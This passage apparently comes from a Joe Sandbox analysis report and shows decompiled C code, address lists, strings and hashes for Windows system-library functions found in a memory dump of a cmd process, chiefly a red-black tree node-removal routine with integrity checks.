					if( *((intOrPtr*)(_t41 + 8)) != 0) {
						 *(_t41 - 4) =  *(_t41 - 4) & 0x00000000;
						asm("int3");
						 *(_t41 - 4) = 0xfffffffe;
					}
				}
				 *(_t41 - 4) = 1;
				 *((intOrPtr*)(_t41 - 0x70)) =  *((intOrPtr*)(_t41 - 0x74));
				 *((intOrPtr*)(_t41 - 0x6c)) = 1;
				 *(_t41 - 0x68) =  *(_t41 - 0x68) & 0x00000000;
				 *((intOrPtr*)(_t41 - 0x64)) = L0371DEF0;
				 *((intOrPtr*)(_t41 - 0x60)) = 1;
				 *((intOrPtr*)(_t41 - 0x5c)) =  *((intOrPtr*)(_t41 - 0x7c));
				_push(_t41 - 0x70);
				L0371DEF0(1, _t38);
				 *(_t41 - 4) = 0xfffffffe;
				return E0371D130(_t34, _t39, _t40);
			}

0x03778df1
0x03778df1
0x03778df1
0x03778df1
0x03778df1
0x03778df1
0x03778df3
0x03778df8
0x03778dfd
0x03778e00
0x03778e0e
0x03778e2a
0x03778e36
0x03778e38
0x03778e3c
0x03778e46
0x03778e46
0x03778e36
0x03778e50
0x03778e56
0x03778e59
0x03778e5c
0x03778e60
0x03778e67
0x03778e6d
0x03778e73
0x03778e74
0x03778eb1
0x03778ebd

Strings

Critical error detected %lx, xrefs: 03778E21

Memory Dump Source

Source File: 00000005.00000002.480396145.00000000036A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036A0000, based on PE: true

Associated: 00000005.00000002.482855504.00000000037BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.483011341.00000000037BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_36a0000_cmd.jbxd

Similarity

API ID:
String ID: Critical error detected %lx
API String ID: 0-802127002
Opcode ID: ff48ef7cc12f9027981442c3a46195a4643dd5e493df6a5a6584e51cb4f95724
Instruction ID: 90f920e9ab45c31a1de40042a877c4826b18a763526a6ef8d1d6f2b38bba4bb3
Opcode Fuzzy Hash: ff48ef7cc12f9027981442c3a46195a4643dd5e493df6a5a6584e51cb4f95724
Instruction Fuzzy Hash: A1115BB6D14348EADF24CFB8C90A7ECBBB0BB04315F28425DE4296B282C3B40601CF16

Uniqueness

Uniqueness Score: -1.00%

Function 0375FF10 Relevance: 1.3, Strings: 1, Instructions: 44COMMON

Download Yara Rule

Strings

NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 0375FF60

Memory Dump Source

Source File: 00000005.00000002.480396145.00000000036A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036A0000, based on PE: true

Associated: 00000005.00000002.482855504.00000000037BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.483011341.00000000037BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_36a0000_cmd.jbxd

Similarity

API ID:
String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
API String ID: 0-1911121157
Opcode ID: dddd3228b6005b0cc214f758ebdb6ad95d34ff038aaa1698cb68a0a3fb22c543
Instruction ID: fc03e738ac2e9771787bd9469fd73018ba2f9954a279ba27ea1f2805588c4789
Opcode Fuzzy Hash: dddd3228b6005b0cc214f758ebdb6ad95d34ff038aaa1698cb68a0a3fb22c543
Instruction Fuzzy Hash: 41112676910244EFDB26EF54C848F9CBBB1FF09714F188454F905AB6A1C7B99950CB50

Uniqueness

Uniqueness Score: -1.00%

Function 036CF900 Relevance: .9, Instructions: 863
COMMONCrypto

Download Yara Rule

C-Code - Quality: 99%

			E036CF900(signed int _a4, signed int _a8) {
				signed char _v5;
				signed char _v6;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed char _t285;
				signed int _t289;
				signed char _t292;
				signed int _t293;
				signed char _t295;
				signed int _t300;
				signed int _t301;
				signed char _t306;
				signed char _t307;
				signed char _t308;
				signed int _t310;
				signed int _t311;
				signed int _t312;
				signed char _t314;
				signed int _t316;
				signed int _t318;
				signed int _t319;
				signed int _t320;
				signed int _t322;
				signed int _t323;
				signed int _t328;
				signed char _t329;
				signed int _t337;
				signed int _t339;
				signed int _t343;
				signed int _t345;
				signed int _t348;
				signed char _t350;
				signed int _t351;
				signed char _t353;
				signed char _t356;
				signed int _t357;
				signed char _t359;
				signed int _t360;
				signed char _t363;
				signed int _t364;
				signed int _t366;
				signed int* _t372;
				signed char _t373;
				signed char _t378;
				signed int _t379;
				signed int* _t382;
				signed int _t383;
				signed char _t385;
				signed int _t387;
				signed int _t388;
				signed char _t390;
				signed int _t393;
				signed int _t395;
				signed char _t397;
				signed int _t401;
				signed int _t405;
				signed int _t407;
				signed int _t409;
				signed int _t410;
				signed int _t413;
				signed char _t415;
				signed int _t416;
				signed char _t418;
				signed int _t419;
				signed int _t421;
				signed int _t422;
				signed int _t423;
				signed char* _t425;
				signed char _t426;
				signed char _t427;
				signed int _t428;
				signed int _t429;
				signed int _t431;
				signed int _t432;
				signed int _t434;
				signed int _t436;
				signed int _t444;
				signed int _t445;
				signed int _t446;
				signed int _t452;
				signed int _t454;
				signed int _t455;
				signed int _t456;
				signed int _t457;
				signed int _t461;
				signed int _t462;
				signed int _t464;
				signed int _t467;
				signed int _t470;
				signed int _t474;
				signed int _t475;
				signed int _t477;
				signed int _t481;
				signed int _t483;
				signed int _t486;
				signed int _t487;
				signed int _t488;

				_t285 =  *(_a4 + 4);
				_t444 = _a8;
				_t452 =  *_t444;
				_t421 = _t285 & 1;
				if(_t421 != 0) {
					if(_t452 != 0) {
						_t452 = _t452 ^ _t444;
					}
				}
				_t393 =  *(_t444 + 4);
				if(_t421 != 0) {
					if(_t393 != 0) {
						_t393 = _t393 ^ _t444;
					}
				}
				_t426 = _t393;
				if(_t452 != 0) {
					_t426 = _t452;
				}
				_v5 = _t285 & 0x00000001;
				asm("sbb eax, eax");
				if((_t393 &  ~_t452) != 0) {
					_t289 = _t393;
					_t427 = _v5;
					_t422 = _t393;
					_v12 = _t393;
					_v16 = 1;
					if( *_t393 != 0) {
						_v16 = _v16 & 0x00000000;
						_t445 =  *_t393;
						goto L115;
						L116:
						_t289 = _t445;
						L117:
						_t445 =  *_t289;
						if(_t445 != 0) {
							L115:
							_t422 = _t289;
							if(_t427 != 0) {
								goto L183;
							}
							goto L116;
						} else {
							_t444 = _a8;
							_v12 = _t289;
							goto L27;
						}
						L183:
						if(_t445 == 0) {
							goto L116;
						}
						_t289 = _t289 ^ _t445;
						goto L117;
					}
					L27:
					if(_t427 != 0) {
						if(_t452 == 0) {
							goto L28;
						}
						_t428 = _t289 ^ _t452;
						L29:
						 *_t289 = _t428;
						_t429 =  *(_t452 + 8);
						_v20 = _t429;
						_t426 = _t429 & 0xfffffffc;
						_t292 =  *(_a4 + 4) & 0x00000001;
						_v6 = _t292;
						_t293 = _v12;
						if(_t292 != 0) {
							if(_t426 != 0) {
								_t426 = _t426 ^ _t452;
							}
						}
						if(_t426 != _t444) {
							L174:
							_t423 = 0x1d;
							asm("int 0x29");
							goto L175;
						} else {
							_t436 = _t293;
							if(_v6 != 0) {
								_t436 = _t436 ^ _t452;
							}
							_v20 = _v20 & 0x00000003;
							_v20 = _v20 | _t436;
							 *(_t452 + 8) = _v20;
							_t426 =  *(_t393 + 8) & 0xfffffffc;
							_t356 =  *(_a4 + 4) & 0x00000001;
							_v6 = _t356;
							_t357 = _v12;
							if(_t356 != 0) {
								if(_t426 != 0) {
									_t426 = _t426 ^ _t393;
								}
							}
							if(_t426 != _t444) {
								goto L174;
							} else {
								_t483 = _t393 ^ _t357;
								_v24 = _t483;
								if(_v6 == 0) {
									_v24 = _t357;
								}
								 *(_t393 + 8) =  *(_t393 + 8) & 0x00000003 | _v24;
								_t426 =  *(_t357 + 4);
								_t444 = _a8;
								_t359 =  *(_a4 + 4) & 0x00000001;
								_v6 = _t359;
								_t360 = _v12;
								_v24 = _t483;
								if(_t359 != 0) {
									_v24 = _t483;
									if(_t426 == 0) {
										goto L37;
									}
									_t426 = _t426 ^ _t360;
									L38:
									if(_v6 == 0) {
										_t483 = _t393;
									}
									_t413 =  *(_t360 + 8);
									 *(_t360 + 4) = _t483;
									_t452 = _t413 & 0xfffffffc;
									_v5 = _t413;
									_t363 =  *(_a4 + 4) & 0x00000001;
									_v6 = _t363;
									if(_t363 != 0) {
										_t364 = _v12;
										_v5 = _t413;
										if(_t452 == 0) {
											goto L41;
										}
										_v20 = _t452;
										_v20 = _v20 ^ _t364;
										L42:
										if(_v20 != _t422) {
											_v5 = _t413;
											if(_v6 == 0) {
												L199:
												_t366 = _v12;
												L200:
												if(_t452 != 0 || _t366 != _t422) {
													goto L174;
												} else {
													goto L43;
												}
											}
											_t366 = _v12;
											_v5 = _t413;
											if(_t452 == 0) {
												goto L199;
											}
											_t452 = _t452 ^ _t366;
											goto L200;
										}
										L43:
										_t486 =  *(_t444 + 8) & 0xfffffffc;
										if(_v6 != 0) {
											if(_t486 != 0) {
												_t486 = _t486 ^ _t444;
											}
											if(_v6 != 0 && _t486 != 0) {
												_t486 = _t486 ^ _t366;
											}
										}
										_t415 = _t413 & 0x00000003 | _t486;
										 *(_t366 + 8) = _t415;
										_t416 = _v12;
										 *(_t416 + 8) = ( *(_t444 + 8) ^ _t415) & 0x00000001 ^ _t415;
										_t452 =  *(_t444 + 8);
										_t372 = _a4;
										if((_t452 & 0xfffffffc) == 0) {
											if( *_t372 != _t444) {
												goto L174;
											} else {
												 *_t372 = _t416;
												goto L52;
											}
										} else {
											_t452 = _t452 & 0xfffffffc;
											_t378 = _t372[1] & 0x00000001;
											_v6 = _t378;
											if(_t378 != 0) {
												if(_t452 != 0) {
													_t452 = _t452 ^ _t444;
												}
											}
											_t379 =  *(_t452 + 4);
											if(_v6 != 0) {
												if(_t379 != 0) {
													_t379 = _t379 ^ _t452;
												}
											}
											_v24 = _t379;
											_t382 = _t452 + (0 | _v24 == _t444) * 4;
											_v28 = _t382;
											_t383 =  *_t382;
											if(_v6 != 0) {
												if(_t383 != 0) {
													_t383 = _t383 ^ _t452;
												}
											}
											if(_t383 != _t444) {
												goto L174;
											} else {
												if(_v6 != 0) {
													_t487 = _t452 ^ _t416;
												} else {
													_t487 = _t416;
												}
												 *_v28 = _t487;
												L52:
												_t373 = _v5;
												L12:
												_t452 = _a4;
												_v5 = _t373 & 0x00000001;
												if(( *(_t452 + 4) & 0x00000001) != 0) {
													if(_t426 == 0) {
														goto L13;
													}
													_t306 = _t422 ^ _t426;
													L14:
													_t444 = _v16;
													 *(_t422 + _t444 * 4) = _t306;
													if(_t426 != 0) {
														_t306 =  *(_t426 + 8) & 0xfffffffc;
														_t418 =  *(_t452 + 4) & 0x00000001;
														_v6 = _t418;
														_t419 = _v12;
														if(_t418 != 0) {
															if(_t306 != 0) {
																_t306 = _t306 ^ _t426;
															}
														}
														if(_t306 != _t419) {
															goto L174;
														} else {
															if(_v6 != 0) {
																if(_t422 != 0) {
																	_t422 = _t422 ^ _t426;
																}
															}
															 *(_t426 + 8) = _t422;
															L24:
															return _t306;
														}
													}
													if(_v5 != _t426) {
														goto L24;
													} else {
														_t395 = _t452;
														_t306 =  *(_t395 + 4);
														L17:
														_t446 = _t423;
														_t434 = _v16 ^ 0x00000001;
														_v24 = _t446;
														_v12 = _t434;
														_t452 =  *(_t423 + _t434 * 4);
														if((_t306 & 0x00000001) != 0) {
															if(_t452 == 0) {
																goto L18;
															}
															_t426 = _t452 ^ _t446;
															L19:
															if(( *(_t426 + 8) & 0x00000001) != 0) {
																_t310 =  *(_t426 + 8) & 0xfffffffc;
																_t444 = _t306 & 1;
																if(_t444 != 0) {
																	if(_t310 != 0) {
																		_t310 = _t310 ^ _t426;
																	}
																}
																if(_t310 != _t423) {
																	goto L174;
																} else {
																	if(_t444 != 0) {
																		if(_t452 != 0) {
																			_t452 = _t452 ^ _t423;
																		}
																	}
																	if(_t452 != _t426) {
																		goto L174;
																	} else {
																		_t452 =  *(_t423 + 8) & 0xfffffffc;
																		if(_t444 != 0) {
																			if(_t452 == 0) {
																				L170:
																				if( *_t395 != _t423) {
																					goto L174;
																				} else {
																					 *_t395 = _t426;
																					L140:
																					if(_t444 != 0) {
																						if(_t452 != 0) {
																							_t452 = _t452 ^ _t426;
																						}
																					}
																					 *(_t426 + 8) =  *(_t426 + 8) & 0x00000003 | _t452;
																					_t300 =  *(_t426 + _v16 * 4);
																					if(_t444 != 0) {
																						if(_t300 == 0) {
																							goto L143;
																						}
																						_t300 = _t300 ^ _t426;
																						goto L142;
																					} else {
																						L142:
																						if(_t300 != 0) {
																							_t401 =  *(_t300 + 8);
																							_t452 = _t401 & 0xfffffffc;
																							if(_t444 != 0) {
																								if(_t452 != 0) {
																									_t452 = _t452 ^ _t300;
																								}
																							}
																							if(_t452 != _t426) {
																								goto L174;
																							} else {
																								if(_t444 != 0) {
																									_t481 = _t300 ^ _t423;
																								} else {
																									_t481 = _t423;
																								}
																								 *(_t300 + 8) = _t401 & 0x00000003 | _t481;
																								goto L143;
																							}
																						}
																						L143:
																						if(_t444 != 0) {
																							if(_t300 != 0) {
																								_t300 = _t300 ^ _t423;
																							}
																						}
																						 *(_t423 + _v12 * 4) = _t300;
																						_t454 = _t426;
																						if(_t444 != 0) {
																							_t455 = _t454 ^ _t423;
																							_t301 = _t455;
																						} else {
																							_t301 = _t423;
																							_t455 = _t454 ^ _t301;
																						}
																						 *(_t426 + _v16 * 4) = _t301;
																						_t395 = _a4;
																						if(_t444 == 0) {
																							_t455 = _t426;
																						}
																						 *(_t423 + 8) =  *(_t423 + 8) & 0x00000003 | _t455;
																						 *(_t426 + 8) =  *(_t426 + 8) & 0x000000fe;
																						 *(_t423 + 8) =  *(_t423 + 8) | 0x00000001;
																						_t426 =  *(_t423 + _v12 * 4);
																						_t306 =  *(_t395 + 4);
																						if((_t306 & 0x00000001) != 0) {
																							if(_t426 != 0) {
																								_t426 = _t426 ^ _t423;
																							}
																						}
																						_t446 = _v24;
																						goto L20;
																					}
																				}
																			}
																			_t452 = _t452 ^ _t423;
																		}
																		if(_t452 == 0) {
																			goto L170;
																		}
																		_t311 =  *(_t452 + 4);
																		if(_t444 != 0) {
																			if(_t311 != 0) {
																				_t311 = _t311 ^ _t452;
																			}
																		}
																		if(_t311 == _t423) {
																			if(_t444 != 0) {
																				L175:
																				_t295 = _t452 ^ _t426;
																				goto L169;
																			} else {
																				_t295 = _t426;
																				L169:
																				 *(_t452 + 4) = _t295;
																				goto L140;
																			}
																		} else {
																			_t312 =  *_t452;
																			if(_t444 != 0) {
																				if(_t312 != 0) {
																					_t312 = _t312 ^ _t452;
																				}
																			}
																			if(_t312 != _t423) {
																				goto L174;
																			} else {
																				if(_t444 != 0) {
																					_t314 = _t452 ^ _t426;
																				} else {
																					_t314 = _t426;
																				}
																				 *_t452 = _t314;
																				goto L140;
																			}
																		}
																	}
																}
															}
															L20:
															_t456 =  *_t426;
															_t307 = _t306 & 0x00000001;
															if(_t456 != 0) {
																if(_t307 != 0) {
																	_t456 = _t456 ^ _t426;
																}
																if(( *(_t456 + 8) & 0x00000001) == 0) {
																	goto L21;
																} else {
																	L56:
																	_t461 =  *(_t426 + _v12 * 4);
																	if(_t307 != 0) {
																		if(_t461 == 0) {
																			L59:
																			_t462 = _v16;
																			_t444 =  *(_t426 + _t462 * 4);
																			if(_t307 != 0) {
																				if(_t444 != 0) {
																					_t444 = _t444 ^ _t426;
																				}
																			}
																			 *(_t444 + 8) =  *(_t444 + 8) & 0x000000fe;
																			_t452 = _t462 ^ 0x00000001;
																			_t405 =  *(_t395 + 4) & 1;
																			_t316 =  *(_t444 + 8) & 0xfffffffc;
																			_v28 = _t405;
																			_v24 = _t452;
																			if(_t405 != 0) {
																				if(_t316 != 0) {
																					_t316 = _t316 ^ _t444;
																				}
																			}
																			if(_t316 != _t426) {
																				goto L174;
																			} else {
																				_t318 = _t452 ^ 0x00000001;
																				_v32 = _t318;
																				_t319 =  *(_t426 + _t318 * 4);
																				if(_t405 != 0) {
																					if(_t319 != 0) {
																						_t319 = _t319 ^ _t426;
																					}
																				}
																				if(_t319 != _t444) {
																					goto L174;
																				} else {
																					_t320 =  *(_t423 + _t452 * 4);
																					if(_t405 != 0) {
																						if(_t320 != 0) {
																							_t320 = _t320 ^ _t423;
																						}
																					}
																					if(_t320 != _t426) {
																						goto L174;
																					} else {
																						_t322 =  *(_t426 + 8) & 0xfffffffc;
																						if(_t405 != 0) {
																							if(_t322 != 0) {
																								_t322 = _t322 ^ _t426;
																							}
																						}
																						if(_t322 != _t423) {
																							goto L174;
																						} else {
																							_t464 = _t423 ^ _t444;
																							_t323 = _t464;
																							if(_t405 == 0) {
																								_t323 = _t444;
																							}
																							 *(_t423 + _v24 * 4) = _t323;
																							_t407 = _v28;
																							if(_t407 != 0) {
																								if(_t423 != 0) {
																									L72:
																									 *(_t444 + 8) =  *(_t444 + 8) & 0x00000003 | _t464;
																									_t328 =  *(_t444 + _v24 * 4);
																									if(_t407 != 0) {
																										if(_t328 == 0) {
																											L74:
																											if(_t407 != 0) {
																												if(_t328 != 0) {
																													_t328 = _t328 ^ _t426;
																												}
																											}
																											 *(_t426 + _v32 * 4) = _t328;
																											_t467 = _t426 ^ _t444;
																											_t329 = _t467;
																											if(_t407 == 0) {
																												_t329 = _t426;
																											}
																											 *(_t444 + _v24 * 4) = _t329;
																											if(_v28 == 0) {
																												_t467 = _t444;
																											}
																											_t395 = _a4;
																											_t452 = _t426;
																											 *(_t426 + 8) =  *(_t426 + 8) & 0x00000003 | _t467;
																											_t426 = _t444;
																											L80:
																											 *(_t426 + 8) =  *(_t426 + 8) ^ ( *(_t426 + 8) ^  *(_t423 + 8)) & 0x00000001;
																											 *(_t423 + 8) =  *(_t423 + 8) & 0x000000fe;
																											 *(_t452 + 8) =  *(_t452 + 8) & 0x000000fe;
																											_t337 =  *(_t426 + 8) & 0xfffffffc;
																											_t444 =  *(_t395 + 4) & 1;
																											if(_t444 != 0) {
																												if(_t337 != 0) {
																													_t337 = _t337 ^ _t426;
																												}
																											}
																											if(_t337 != _t423) {
																												goto L174;
																											} else {
																												_t339 =  *(_t423 + _v12 * 4);
																												if(_t444 != 0) {
																													if(_t339 != 0) {
																														_t339 = _t339 ^ _t423;
																													}
																												}
																												if(_t339 != _t426) {
																													goto L174;
																												} else {
																													_t452 =  *(_t423 + 8) & 0xfffffffc;
																													if(_t444 != 0) {
																														if(_t452 == 0) {
																															L160:
																															if( *_t395 != _t423) {
																																goto L174;
																															} else {
																																 *_t395 = _t426;
																																L93:
																																if(_t444 != 0) {
																																	if(_t452 != 0) {
																																		_t452 = _t452 ^ _t426;
																																	}
																																}
																																_t409 = _v16;
																																 *(_t426 + 8) =  *(_t426 + 8) & 0x00000003 | _t452;
																																_t343 =  *(_t426 + _t409 * 4);
																																if(_t444 != 0) {
																																	if(_t343 == 0) {
																																		goto L96;
																																	}
																																	_t343 = _t343 ^ _t426;
																																	goto L95;
																																} else {
																																	L95:
																																	if(_t343 != 0) {
																																		_t410 =  *(_t343 + 8);
																																		_t452 = _t410 & 0xfffffffc;
																																		if(_t444 != 0) {
																																			if(_t452 != 0) {
																																				_t452 = _t452 ^ _t343;
																																			}
																																		}
																																		if(_t452 != _t426) {
																																			goto L174;
																																		} else {
																																			if(_t444 != 0) {
																																				_t474 = _t343 ^ _t423;
																																			} else {
																																				_t474 = _t423;
																																			}
																																			 *(_t343 + 8) = _t410 & 0x00000003 | _t474;
																																			_t409 = _v16;
																																			goto L96;
																																		}
																																	}
																																	L96:
																																	if(_t444 != 0) {
																																		if(_t343 != 0) {
																																			_t343 = _t343 ^ _t423;
																																		}
																																	}
																																	 *(_t423 + _v12 * 4) = _t343;
																																	if(_t444 != 0) {
																																		_t345 = _t426 ^ _t423;
																																		_t470 = _t345;
																																	} else {
																																		_t345 = _t423;
																																		_t470 = _t426 ^ _t345;
																																	}
																																	 *(_t426 + _t409 * 4) = _t345;
																																	if(_t444 == 0) {
																																		_t470 = _t426;
																																	}
																																	_t306 =  *(_t423 + 8) & 0x00000003 | _t470;
																																	 *(_t423 + 8) = _t306;
																																	goto L24;
																																}
																															}
																														}
																														_t452 = _t452 ^ _t423;
																													}
																													if(_t452 == 0) {
																														goto L160;
																													}
																													_t348 =  *(_t452 + 4);
																													if(_t444 != 0) {
																														if(_t348 != 0) {
																															_t348 = _t348 ^ _t452;
																														}
																													}
																													if(_t348 == _t423) {
																														if(_t444 != 0) {
																															_t350 = _t452 ^ _t426;
																														} else {
																															_t350 = _t426;
																														}
																														 *(_t452 + 4) = _t350;
																														goto L93;
																													} else {
																														_t351 =  *_t452;
																														if(_t444 != 0) {
																															if(_t351 != 0) {
																																_t351 = _t351 ^ _t452;
																															}
																														}
																														if(_t351 != _t423) {
																															goto L174;
																														} else {
																															if(_t444 != 0) {
																																_t353 = _t452 ^ _t426;
																															} else {
																																_t353 = _t426;
																															}
																															 *_t452 = _t353;
																															goto L93;
																														}
																													}
																												}
																											}
																										}
																										_t328 = _t328 ^ _t444;
																									}
																									if(_t328 != 0) {
																										_t475 =  *(_t328 + 8);
																										_v20 = _t475;
																										_t452 = _t475 & 0xfffffffc;
																										if(_t407 != 0) {
																											if(_t452 != 0) {
																												_t452 = _t452 ^ _t328;
																											}
																										}
																										if(_t452 != _t444) {
																											goto L174;
																										} else {
																											if(_t407 != 0) {
																												_t477 = _t328 ^ _t426;
																											} else {
																												_t477 = _t426;
																											}
																											_v20 = _v20 & 0x00000003;
																											_v20 = _v20 | _t477;
																											 *(_t328 + 8) = _v20;
																											goto L74;
																										}
																									}
																									goto L74;
																								}
																							}
																							_t464 = _t423;
																							goto L72;
																						}
																					}
																				}
																			}
																		}
																		_t452 = _t461 ^ _t426;
																	}
																	if(_t452 == 0 || ( *(_t452 + 8) & 0x00000001) == 0) {
																		goto L59;
																	} else {
																		goto L80;
																	}
																}
															}
															L21:
															_t457 =  *(_t426 + 4);
															if(_t457 != 0) {
																if(_t307 != 0) {
																	_t457 = _t457 ^ _t426;
																}
																if(( *(_t457 + 8) & 0x00000001) == 0) {
																	goto L22;
																} else {
																	goto L56;
																}
															}
															L22:
															_t308 =  *(_t423 + 8);
															if((_t308 & 0x00000001) == 0) {
																 *(_t426 + 8) =  *(_t426 + 8) | 0x00000001;
																_t306 =  *(_t395 + 4);
																_t431 =  *(_t423 + 8) & 0xfffffffc;
																_t397 = _t306 & 0x00000001;
																if(_t397 != 0) {
																	if(_t431 == 0) {
																		goto L110;
																	}
																	_t423 = _t423 ^ _t431;
																	L111:
																	if(_t423 == 0) {
																		goto L24;
																	}
																	_t432 =  *(_t423 + 4);
																	if(_t397 != 0) {
																		if(_t432 != 0) {
																			_t432 = _t432 ^ _t423;
																		}
																	}
																	_v16 = 0 | _t432 == _t446;
																	_t395 = _a4;
																	goto L17;
																}
																L110:
																_t423 = _t431;
																goto L111;
															} else {
																_t306 = _t308 & 0x000000fe;
																 *(_t423 + 8) = _t306;
																 *(_t426 + 8) =  *(_t426 + 8) | 0x00000001;
																goto L24;
															}
														}
														L18:
														_t426 = _t452;
														goto L19;
													}
												}
												L13:
												_t306 = _t426;
												goto L14;
											}
										}
									}
									L41:
									_t366 = _v12;
									_v20 = _t452;
									goto L42;
								}
								L37:
								_t483 = _v24;
								goto L38;
							}
						}
					}
					L28:
					_t428 = _t452;
					goto L29;
				}
				_t385 = _v5;
				_t422 =  *(_t444 + 8) & 0xfffffffc;
				if(_t385 != 0) {
					if(_t422 != 0) {
						_t422 = _t422 ^ _t444;
					}
				}
				_v12 = _t444;
				if(_t422 == 0) {
					if(_t426 != 0) {
						 *(_t426 + 8) =  *(_t426 + 8) & 0x00000000;
					}
					_t425 = _a4;
					if( *_t425 != _t444) {
						goto L174;
					} else {
						_t425[4] = _t426;
						_t306 = _t425[4] & 0x00000001;
						if(_t306 != 0) {
							_t425[4] = _t425[4] | 0x00000001;
						}
						 *_t425 = _t426;
						goto L24;
					}
				} else {
					_t452 =  *(_t422 + 4);
					if(_t385 != 0) {
						if(_t452 != 0) {
							_t452 = _t452 ^ _t422;
						}
					}
					if(_t452 == _t444) {
						_v16 = 1;
						L11:
						_t373 =  *(_t444 + 8);
						goto L12;
					} else {
						_t387 =  *_t422;
						if(_v5 != 0) {
							if(_t387 != 0) {
								_t387 = _t387 ^ _t422;
							}
						}
						if(_t387 != _t444) {
							goto L174;
						} else {
							_t488 = _a4;
							_v16 = _v16 & 0x00000000;
							_t388 =  *(_t488 + 4);
							_v24 = _t388;
							if((_t388 & 0xfffffffe) == _t444) {
								if(_t426 != 0) {
									 *(_t488 + 4) = _t426;
									if((_v24 & 0x00000001) != 0) {
										_t390 = _t426;
										L228:
										 *(_t488 + 4) = _t390 | 0x00000001;
									}
									goto L11;
								}
								 *(_t488 + 4) = _t422;
								if((_v24 & 0x00000001) == 0) {
									goto L11;
								} else {
									_t390 = _t422;
									goto L228;
								}
							}
							goto L11;
						}
					}
				}
			}

0x036cf90b
0x036cf911
0x036cf917
0x036cf919
0x036cf91c
0x03725d63
0x03725d69
0x03725d69
0x03725d63
0x036cf922
0x036cf927
0x03725d72
0x03725d78
0x03725d78
0x03725d72
0x036cf92d
0x036cf931
0x036cfa2d
0x036cfa2d
0x036cf939
0x036cf940
0x036cf944
0x036cfa37
0x036cfa39
0x036cfa3c
0x036cfa3e
0x036cfa41
0x036cfa48
0x036cfe68
0x036cfe6c
0x036cfe6c
0x036cfe78
0x036cfe78
0x036cfe7a
0x036cfe7a
0x036cfe7e
0x036cfe6e
0x036cfe6e
0x036cfe72
0x00000000
0x00000000
0x00000000
0x036cfe80
0x036cfe80
0x036cfe83
0x00000000
0x036cfe83
0x03725d7f
0x03725d81
0x00000000
0x00000000
0x03725d87
0x00000000
0x03725d87
0x036cfa4e
0x036cfa50
0x03725d90
0x00000000
0x00000000
0x03725d98
0x036cfa58
0x036cfa58
0x036cfa5d
0x036cfa60
0x036cfa63
0x036cfa69
0x036cfa6b
0x036cfa6e
0x036cfa71
0x03725da1
0x03725da7
0x03725da7
0x03725da1
0x036cfa79
0x036d0071
0x036d0073
0x036d0074
0x00000000
0x036cfa7f
0x036cfa83
0x036cfa85
0x03725dae
0x03725dae
0x036cfa8b
0x036cfa8f
0x036cfa98
0x036cfaa1
0x036cfaa4
0x036cfaa6
0x036cfaa9
0x036cfaac
0x03725db7
0x03725dbd
0x03725dbd
0x03725db7
0x036cfab4
0x00000000
0x036cfaba
0x036cfabc
0x036cfac2
0x036cfac5
0x036cfac7
0x036cfac7
0x036cfad6
0x036cfad9
0x036cfadf
0x036cfae2
0x036cfae4
0x036cfae7
0x036cfaea
0x036cfaed
0x03725dc4
0x03725dc9
0x00000000
0x00000000
0x03725dcf
0x036cfaf6
0x036cfafa
0x036cfafc
0x036cfafc
0x036cfafe
0x036cfb01
0x036cfb09
0x036cfb0c
0x036cfb12
0x036cfb14
0x036cfb17
0x03725dd6
0x03725dd9
0x03725dde
0x00000000
0x00000000
0x03725de4
0x03725de7
0x036cfb29
0x036cfb2c
0x03725df3
0x03725df6
0x03725e06
0x03725e0c
0x03725e0f
0x03725e11
0x00000000
0x03725e1f
0x00000000
0x03725e1f
0x03725e11
0x03725df8
0x03725dfb
0x03725e00
0x00000000
0x00000000
0x03725e02
0x00000000
0x03725e02
0x036cfb32
0x036cfb35
0x036cfb3c
0x03725e26
0x03725e28
0x03725e28
0x03725e2e
0x03725e3c
0x03725e3c
0x03725e2e
0x036cfb45
0x036cfb47
0x036cfb53
0x036cfb56
0x036cfb59
0x036cfb5c
0x036cfb65
0x036d000d
0x00000000
0x036d000f
0x036d000f
0x00000000
0x036d000f
0x036cfb6b
0x036cfb6e
0x036cfb71
0x036cfb73
0x036cfb76
0x03725e45
0x03725e4b
0x03725e4b
0x03725e45
0x036cfb80
0x036cfb83
0x03725e54
0x03725e5a
0x03725e5a
0x03725e54
0x036cfb89
0x036cfb98
0x036cfb9b
0x036cfb9e
0x036cfba0
0x03725e63
0x03725e69
0x03725e69
0x03725e63
0x036cfba8
0x00000000
0x036cfbae
0x036cfbb2
0x03725e70
0x036cfbb8
0x036cfbb8
0x036cfbb8
0x036cfbbd
0x036cfbbf
0x036cfbbf
0x036cf9a8
0x036cf9a8
0x036cf9ad
0x036cf9b4
0x03725eda
0x00000000
0x00000000
0x03725ee2
0x036cf9bc
0x036cf9bc
0x036cf9bf
0x036cf9c4
0x036cfde6
0x036cfde9
0x036cfdec
0x036cfdef
0x036cfdf2
0x03725eeb
0x03725ef1
0x03725ef1
0x03725eeb
0x036cfdfa
0x00000000
0x036cfe00
0x036cfe04
0x03725efa
0x03725f00
0x03725f00
0x03725efa
0x036cfe0a
0x036cfa24
0x036cfa2a
0x036cfa2a
0x036cfdfa
0x036cf9cd
0x00000000
0x036cf9cf
0x036cf9cf
0x036cf9d1
0x036cf9d4
0x036cf9d7
0x036cf9d9
0x036cf9dc
0x036cf9df
0x036cf9e2
0x036cf9e7
0x03725f09
0x00000000
0x00000000
0x03725f11
0x036cf9ef
0x036cf9f3
0x036cfed5
0x036cfed8
0x036cfedb
0x03725f1a
0x03725f20
0x03725f20
0x03725f1a
0x036cfee3
0x00000000
0x036cfee9
0x036cfeeb
0x03725f29
0x03725f2f
0x03725f2f
0x03725f29
0x036cfef3
0x00000000
0x036cfef9
0x036cfefc
0x036cff01
0x03725f38
0x036d0052
0x036d0054
0x00000000
0x036d0056
0x036d0056
0x036cff40
0x036cff42
0x03725f6e
0x03725f74
0x03725f74
0x03725f6e
0x036cff50
0x036cff56
0x036cff5b
0x03725f7d
0x00000000
0x00000000
0x03725f83
0x00000000
